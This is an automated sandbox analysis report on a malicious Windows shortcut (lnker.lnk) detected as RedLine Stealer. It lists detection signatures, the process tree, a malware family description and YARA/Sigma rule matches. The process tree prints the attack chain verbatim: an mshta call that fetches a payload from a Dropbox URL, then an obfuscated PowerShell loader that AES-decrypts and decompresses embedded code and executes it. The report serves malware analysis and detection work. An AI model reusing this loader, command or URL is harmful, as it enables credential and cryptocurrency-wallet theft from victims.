Edit tour
Windows
Analysis Report
lnker.lnk
Overview
General Information
| Sample name: | lnker.lnk |
| Analysis ID: | 1398933 |
| MD5: | c7945d1c593363055616d6e427b8e2a2 |
| SHA1: | 2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b |
| SHA256: | 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50 |
| Tags: | lnk |
| Infos: |   |
 | |
Detection
RedLine
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RedLine Stealer
.NET source code contains very large array initializations
Drops PE files to the startup folder
Found URL in windows shortcut file (LNK)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
forfiles.exe (PID: 2540 cmdline: "C:\Window s\System32 \forfiles. exe" /p C: \Windows\V ss /c "pow ershell st art mshta https://dl .dropboxus ercontent. com/scl/fi /aur0asu19 5akuhc7q88 lq/mlwr?rl key=ltpi9k ve7882q0vk svvb54han MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) 
conhost.exe (PID: 2812 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 6328 cmdline: start msht a https:// dl.dropbox userconten t.com/scl/ fi/aur0asu 195akuhc7q 88lq/mlwr? rlkey=ltpi 9kve7882q0 vksvvb54ha n MD5: 04029E121A0CFA5991749937DD22A1D9) 
mshta.exe (PID: 2492 cmdline: "C:\Window s\system32 \mshta.exe " https:// dl.dropbox userconten t.com/scl/ fi/aur0asu 195akuhc7q 88lq/mlwr? rlkey=ltpi 9kve7882q0 vksvvb54ha n MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 1900 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $xR nrtl = 'AA AAAAAAAAAA AAAAAAAAAD 0Af5kmiW2H nx1ert6ZiH kcrCG5xRw5 g+RXkvjSvg aUbk+srbVr OsQgn8toO+ hu0Qw1KQj7 FAk5xMoqfe LJjMEeamlW rF3FTQ6in6 FDMU0esWs4 1x91rJ/vkr JQOkHUMM2M mLD03n+lBr w2YeIcINOq vu4GIVPjd+ Fis/QpUW5F j8iNCDQy7b Teb/cl1K0K C1ocqAlvj8 3iKlmuvdzx Pum6cIQxLt +2YLh6fmAQ ocUETi+pQw 294/BrcWHi PbCLQ3IVN1 QFO/QcDcgm CGGhLZSmlS KvXWS4pkFT nsaeCv0q8q pFQPIbBpzG kWGBKxMJYh Qh81lXHyPx eOeFyFq6jq W2vUm+uqMC wX1N5g5UHX Yw3Qg4zpyO Cq0I5EwoDq zACg0FQ7NL bZAuwhTLK+ Yu1JUpq7a8 6i+FRnVjkA 9yOJMjUROJ tiOoDNfMdo 0ej8BzSKoi d4bytekfnZ Gfb1xfEAyr NCki102wWc JK/vZZFJJQ 0EWOmR4qPc lxZ3kj3QXa 7iwBBn/xEM Gg8xE8RDWa HfXHZqdxlp noKmQX6Cch YBPK5Q/alH BAM5gOIN5R cmnQecgz+i tBcGKRKac4 QUIuYCsTNO GFGvc0/93U PNG9W8OrCD +b24Y2bZP/ KolyWolNdj JRHwp4RJAA 9iJshbpdMe 4n95z2TmNV PEVN28sDZ0 kfiJCKpkbu 1TkpQNSnY4 6SLTiZTT3a jO8Sox/hCn ztghhj4DMh fQfHJBcMyZ 1yynlBM+7l NgUyvioQxQ 2KPY7KDi7J Tpk1iQYGc+ oBvO/fWUMt z9kzyEyxJp OGkwI3MMjD pUYIc9iprf EHj8hpwVdP jhcenIyhZq n28939Mlit Hffq24shDM zCPgjnU9OW PsMhEKvfu3 4pU/yjbMkw LHEjcQ=='; $PWFaA = ' d0hDTktlem N0SlFHRXFl a0Rjb094cn RoUGlSR050 VmI=';$rtb rSxS = New -Object 'S ystem.Secu rity.Crypt ography.Ae sManaged'; $rtbrSxS.M ode = [Sys tem.Securi ty.Cryptog raphy.Ciph erMode]::E CB;$rtbrSx S.Padding = [System. Security.C ryptograph y.PaddingM ode]::Zero s;$rtbrSxS .BlockSize = 128;$rt brSxS.KeyS ize = 256; $rtbrSxS.K ey = [Syst em.Convert ]::FromBas e64String( $PWFaA);$j IXAy = [Sy stem.Conve rt]::FromB ase64Strin g($xRnrtl) ;$rSpXWojt = $jIXAy[ 0..15];$rt brSxS.IV = $rSpXWojt ;$mXooDLjj w = $rtbrS xS.CreateD ecryptor() ;$KHnzkbgX Q = $mXooD Ljjw.Trans formFinalB lock($jIXA y, 16, $jI XAy.Length - 16);$rt brSxS.Disp ose();$iIa uy = New-O bject Syst em.IO.Memo ryStream( , $KHnzkbg XQ );$Izyr h = New-Ob ject Syste m.IO.Memor yStream;$t hcRRYmqg = New-Objec t System.I O.Compress ion.GzipSt ream $iIau y, ([IO.Co mpression. Compressio nMode]::De compress); $thcRRYmqg .CopyTo( $ Izyrh );$t hcRRYmqg.C lose();$iI auy.Close( );[byte[]] $QWoIKfh = $Izyrh.T oArray();$ KKSHrJAF = [System.T ext.Encodi ng]::UTF8. GetString( $QWoIKfh); $KKSHrJAF | powershe ll - MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7220 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9) 
WmiPrvSE.exe (PID: 7404 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - driver.exe (PID: 7648 cmdline:
"C:\Users\ user\AppDa ta\Roaming \driver.ex e" MD5: 80B60930BD4A6F65F57F3A2F40CCC6F7) - conhost.exe (PID: 7672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - qemu-ga.exe (PID: 4460 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\qem u-ga.exe" MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
- svchost.exe (PID: 6520 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
OpenWith.exe (PID: 7756 cmdline: C:\Windows \system32\ OpenWith.e xe -Embedd ing MD5: E4A834784FA08C17D47A1E72429C5109)
- qemu-ga.exe (PID: 7580 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\qem u-ga.exe" MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security | ||
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 1 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||